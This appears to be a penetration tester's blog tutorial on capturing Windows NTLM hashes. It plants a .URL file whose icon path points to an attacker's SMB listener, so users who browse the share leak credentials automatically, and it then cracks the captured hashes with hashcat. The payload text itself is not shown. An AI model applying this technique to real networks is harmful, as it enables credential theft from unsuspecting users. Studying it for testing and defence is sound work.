A better way to capture hashes with no user interaction by @_markmo_
I found a better way to capture hashes from a post by @insertscript on twitter
This uses a .URL file with that accesses environment variables and causes the user to connect to the attackers file share without any user interaction. Here is the quote from @insertscript “As soon as explorer.exe views a folder, which contains a .URL file, it will lookup any specified environment variable like %PATH%or %USERNAME% before sending the actual request, therefore leaking its content to the attacker controlled server.” (https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html)
Right, first we setup an SMBListener on our attacking machine (probably on an internal network as most companies block outbound SMB).
Next we create a text file on a file share, hopefully somewhere with a lot of traffic like shared document. (once you create the file you can drop it on any share).
Paste this into the text file:
You only need to replace the IconFile PATH with the share you setup in the first step with SMBServer, Responder or Inveigh.
***PLEASE NOTE*** to leave the %USERNAME%.icon exactly where it is. This is what initiates the connection
Here is what it should look like when you are done
Now, make sure you have view file extensions and hidden files on.
Rename you file with a .URL extension and the magic will begin.
It should look like this when you are done
You should ALREADY have a connection in your smb listener!
Now anyone that visits that share will attempt to automatically authenticate to your SMB listener. If you want to be extra sneaky change the icon of your .URL file. Also, see the notes at the end.
Now to crack with hashcat. Copy the hash
Paste it into a file (i’m just echoing it to a file)
Run hashcat and hopefully the password is in your password list
Hooray Cracked It!
Huge thanks to @insertscript for sharing that info.
Feel free to follow me on twitter @_markmo_
I try to share what I learn as so many have done for me.
FINAL NOTE. While testing I found some weird behavior when I tried to use the same filename more than once that prevented things from working correctly. To make your life easy just create unique filename every time (1.url, 2.url, etc).